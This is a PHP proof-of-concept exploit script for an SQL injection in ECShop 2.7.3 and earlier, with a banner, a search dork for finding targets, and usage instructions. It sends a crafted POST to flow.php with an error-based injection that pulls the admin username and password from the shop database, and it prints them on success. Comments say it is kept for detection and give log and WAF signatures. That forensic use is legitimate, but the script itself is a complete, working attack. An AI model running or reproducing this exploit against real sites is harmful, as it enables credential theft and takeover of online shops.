ECShop <= v2.7.3 SQL injection / exploit
好像是最新的
<?php
// Historical proof-of-concept script for the ECShop <= 2.7.3 flow.php SQL injection.
// Kept here for detection/forensics review: the comments below point out the
// request and response artefacts a defender can search logs or WAF rules for.
// The banner is printed verbatim; nothing is sent until send() is called further down.
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.7.3 SQL injection / exploit
by 帅的一塌糊涂
mail: hiqiushuiabc gmail dot com
team: [url]http://hi.baidu.com/w5r2[/url]
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
// Two positional CLI arguments are required (host, path); otherwise print usage and stop.
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
// error_reporting(7) == E_ERROR | E_WARNING | E_PARSE: notices (e.g. the undefined
// $arr[1] index when the marker is absent from the response) are silenced.
error_reporting(7);
ini_set('max_execution_time', 0);
// Unvalidated CLI input; send() reads both values through `global`.
$host = $argv[1];
$path = $argv[2];
// send() returns the raw HTTP response, or '' when the socket could not be opened/read.
$str = send();
if ( $str){
// The injected SQL wraps the extracted admin row in the literal markers "ouou~" ... "~1"
// (the hex constants 0x6F756F757E / 0x7E31 in the payload) so it can be picked out of the
// MySQL error text the target echoes back. That marker is a reliable signature for
// web-server/error-log searches and for IDS/WAF rules when checking whether a site was hit.
preg_match('/ouou~(.*?)~1/', $str, $arr);
// The row is emitted as "user_name-password" (0x2D == "-"). When nothing matched, $arr[1]
// is undefined (notice suppressed above), explode() yields [""] and the failure branch runs.
$result=explode("-",$arr[1]);
if($result[0]=="")
{
print_r("Exploit Failed! \n");
}
else
{
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
}
}
/**
 * Sends a single hand-crafted HTTP/1.1 POST to <path>flow.php on the target and returns the
 * raw response body+headers as a string ('' if the socket could not be opened or read).
 *
 * Uses the global $host and $path set from the CLI; neither is validated here.
 */
function send()
{
global $host, $path;
// Request body: the cart "update_cart" step with a goods_number[] *array key* that carries
// a MySQL error-based injection (count(*)/GROUP BY over floor(rand(0)*2) to force a
// duplicate-key error whose message leaks the selected ecs_admin_user row). The vulnerable
// code path evidently used that key unescaped in SQL; the mitigation is to upgrade past
// 2.7.3 and to make sure cart-row identifiers are validated as integers before reaching the
// query (confirm against the vendor fix). Detection: SQL keywords, quotes or a "#" comment
// terminator inside a form-field *key* is a strong WAF/IDS signal, and the constant
// 0x6F756F757E ("ouou~") marker is a literal indicator to search request logs for.
$cmd ='step=update_cart&goods_number[-111%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,user_name,0x2D,password,0x7E31)%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#]=2';
// Raw HTTP request assembled by hand; plain TCP on port 80, no TLS. The fixed MSIE 6.00
// User-Agent and the zh-cn Accept-Language header are further log-searchable artefacts.
$data = "POST ".$path."flow.php HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;
// fsockopen() failure is never checked: $fp === false makes fputs() emit a warning and the
// `$fp && ...` loop guard below simply skips reading, so '' is returned to the caller.
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
// Read until EOF in 1 KiB chunks; "Connection: Close" above is what makes EOF arrive.
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
// Unreachable: placed after the return statement.
echo $resp;
}
?>